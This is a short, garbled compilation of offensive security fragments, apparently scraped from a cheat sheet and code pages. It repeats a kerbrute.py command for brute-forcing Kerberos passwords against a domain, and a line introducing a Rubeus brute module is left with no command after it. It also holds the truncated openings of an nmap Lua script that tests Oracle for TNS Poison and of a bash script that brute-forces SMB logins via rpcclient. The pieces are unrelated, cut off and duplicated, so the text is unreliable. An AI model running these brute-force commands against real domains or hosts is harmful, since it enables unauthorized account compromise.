With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
local bin = require "bin" | |
local io = require "io" | |
local nmap = require "nmap" | |
local shortport = require "shortport" | |
local stdnse = require "stdnse" | |
local table = require "table" | |
description = [[ | |
Simple module to test Oracle DB server for TNS Poison vulnerability. | |
Module sends to server a packet with command to register new TNS Listener and check response |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#!/bin/bash | |
HOST="$1" | |
USERS="$2" | |
PASSWORDS="$3" | |
SLEEP="$4" | |
TMP_FILE="/tmp/tmp_smb.$$.tmp" | |
RPCCLIENT=$(which rpcclient) | |
NMBLOOKUP=$(which nmblookup) |